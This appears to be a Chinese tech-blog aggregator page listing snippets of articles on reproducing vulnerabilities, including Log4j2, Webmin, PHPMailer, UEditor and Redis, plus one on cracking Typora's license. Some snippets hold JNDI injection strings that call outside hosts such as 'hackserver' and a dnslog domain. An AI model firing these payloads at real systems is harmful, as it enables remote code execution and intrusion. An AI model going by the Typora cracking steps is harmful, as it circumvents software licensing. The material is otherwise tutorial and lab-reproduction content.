ICode9

精准搜索请尝试: 精确搜索
  • 第8节:EM算法及numpy复现2021-12-23 11:04:14

    文章目录 EM期望极大算法(expectation maximization algorithm)numpy复现 EM期望极大算法(expectation maximization algorithm) 用于含有隐变量 (hidden variable)的概率模型参数的极大似然估计,或极大后验概率估计。EM算法的每 次迭代由两步组成: E步,求期望(expectation);M步,

  • webmin 远程代码漏洞复现2021-12-20 13:07:03

    漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行 漏洞环境

  • 2018领航杯awd简单复现2021-12-19 17:31:24

    首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: 这里能cat flag 修补增加过滤或者删除漏洞 2级的fwrite审计: 利用seay工具进行代码审

  • 快速复现利用Log4j漏洞启动windows计算器2021-12-17 22:31:28

    了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u102,不能高于这个版本。 通过如下pom.xml建立一个maven项目 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/

  • log4j-rce复现2021-12-15 12:33:44

    声明:没研究过Java漏洞,有错误的地方一定要告诉我!!原理我也没有继续跟。 01 分析 师傅带着理了一遍,思路清晰了。 一句话总结就是:让引用了log4j的漏洞类,然后把${jndi:ldap://hackserver/xxxxxx}当作参数传到log4j的log.error ,就会通过动态的远程加载我们精心构造的一个恶意类,恶意类编

  • log4j2 JNDI注入复现2021-12-14 17:02:36

    复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个pos

  • 网络渗透测试作业:笑脸漏洞复现2021-12-13 23:58:28

     笑脸漏洞复现 工具: 攻击机:kali 192.168.79.128 靶机:Metasplotable2-Linux  192.168.79.131   复现过程 打开 kali 终端,执行以下命令:nmap 主机IP/24 发现靶机 (192.168.118.131) 打开着 21 端口   输入命令:nmap -sV 靶机IP  可以看到靶机的ftp服务的版本信息是vsftpd 2.

  • Ueditor Rce漏洞复现&分析2021-12-13 21:34:59

    0x00 前言 复现学习 0x01 漏洞复现 环境搭建参考这篇blog,主要是在ueditor主目录创建WEB-INF/lib,并将jar包移到该lib下,启动tomcat服务器。 请求内网服务器地址 0x02 漏洞原理 该ssrf属于过滤规则不严谨导致可以任意请求内网地址。 先看看controller.jsp,请求进来时,调用 ActionEnt

  • PHPMailer远程命令执行漏洞复现2021-12-13 13:34:55

    PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应

  • Log4j2远程命令执行复现2021-12-12 22:59:29

    Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回

  • 安全漏洞之Log4j2漏洞复现绕过分析2021-12-12 21:33:26

    0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/bad

  • 织梦复现任务2021-12-11 23:03:06

    主题:【复现任务】织梦CMS前台任意用户密码修改漏洞 漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和

  • Typora破解复现2021-12-11 13:04:03

    第一步拉进火绒安全工具进行分析 查看相关dll 进一步查看到日志路径 {UsersRoot}\AppData\Roaming\Typora\typora.log 按照吾爱上面的教程来看大佬是购买了正版 然后License进行查看分析 以下为搬运 1. 在报错log中发现 有app.asar 于是大佬进行解包 我下载了github上对应

  • Log4j 漏洞复现2021-12-11 01:33:51

    pom.xml 中: <dependencies> <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>l

  • HashMap 死锁全网没有一个可以复现的demo2021-12-09 16:01:49

    今天写这篇文章着实有些无奈,很多文章都是分析Hashmap 死锁问题,包括著名的:左耳朵耗子 疫苗:Java HashMap的死循环 | 酷 壳 - CoolShell @左耳朵耗子 这篇文章开头描述了问题,但是并没有给复现,我自己多番测试也暂时还没有复现,而网上都是各种copy 文章,这也许就是技术的无奈吧。

  • 何恺明一作论文 MAE 已有人复现!Pytorch版2021-11-30 11:02:00

    https://mp.weixin.qq.com/s/WSGh6hz8bXVcOyjmk0Ud5Q 何恺明一作论文 MAE 已有人复现!Pytorch版 AI派 2021-11-30 09:17 仅作学术分享,不代表本公众号立场,侵权联系删除 转载于:AI算法与图像处理 复现代码: https://github.com/pengzhiliang/MAE-pytorch 何恺明大佬新作一发出来,知乎

  • yii2 反序列化漏洞复现与分析2021-11-29 23:01:35

    环境搭建 漏洞在yii2.0.38之前的版本,下载2.0.37basic版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 修改/config/web文件的值 在当前目录输入php yii serve启动 复现 先构造反序列化的入口 新建一个controller <?php namespace app\controllers; class

  • Redis未授权漏洞复现2021-11-29 11:30:39

    简介         Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis

  • DenseNet论文详解及PyTorch复现2021-11-27 20:58:41

    DenseNet 1. ResNet 与 DenseNet ResNet(深度残差网络,Deep residual network, ResNet):通过建立前面层与后面层之间的“短路连接”,这有助于训练过程中梯度的反向传播,从而能训练出更深的CNN网络。 DenseNet:采用密集连接机制,即互相连接所有的层,每个层都会与前面所有层在channel维

  • 《多种机器学习视角下的入侵检测研究》论文复现Day022021-11-26 23:34:43

    Day01中的数值化代码其实并不能成功运行,原因在于Python3.8里time.clock()用法已经被移除,于是我找到了Python time time()方法 | 菜鸟教程 (runoob.com)使用time.time()函数替代time.clock即可。Python time.time() 返回当前时间的时间戳(1970纪元后经过的浮点秒数),使用时需要import

  • DC-1靶机复现2021-11-25 11:31:19

    靶机下载:https://www.five86.com/ 一、主机扫描 (kali作为攻击机和DC靶机都做了NAT地址,都在同一网段中) 1.利用 arp-scan -l 命令扫描同网段内的其他存活主机。 2.利用nmap工具来对目标靶机进行探测 nmap -A 192.168.1.131 -p- 或者:nmap -p 1-65535 -A -sV 192.168.1.131 发现开

  • 设置随机种子复现Pytorch、TensorFlow结果2021-11-24 14:02:17

    设置随机种子复现Pytorch、TensorFlow结果 有时候在我们的学习过程中,我们对同一个代码怎么进行比较,怎么复现别人的结果 然后我就想,因为我希望我的结果是可复现的,而不是很随机的,这样可以让人复现结果的时候更加容易,也更加方便 这里我只记录了两个框架的,其中如果利用TensorFlow

  • CVE-2020-3452漏洞复现2021-11-21 21:00:31

    一、前言     前端时间碰到了该漏洞,记录一下! 二、漏洞介绍     该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下: Cisco ASA:<= 9.6 Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14 Cisco FTD:6.2.2 , 6.2.3 ,

  • 复现文件上传漏洞(1-23)靶场练习2021-11-20 16:02:41

    靶场搭建过程很简单,不会自行百度。我这里略过。 靶场源码地址:github.com/c0ny1/upload-labs 我这里为了方便,就下载了靶主已经集成配置好的环境进行本地搭建。地址:github.com/c0ny1/upload-labs/releases 本地搭建好是下面这个页面:  文件上传简介 文件上传(一) 在现代互联网的许

  • Alpha冲刺(1/3) 庄薪霖2021-11-19 20:33:00

    Alpha冲刺(1/3) 已经完成的工作 1.AI研习社冠军代码复现: 该代码基于PyTorch框架。目前已经成功复现该代码(基于EfficientNetB3),且利用Colab平台提供的GPU资源完成了10个epoch的训练。当前达到的最高精度是87.875% 另外,由于Colab提供的GPU资源有限(每当连续使用4h就要禁用24h),另

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有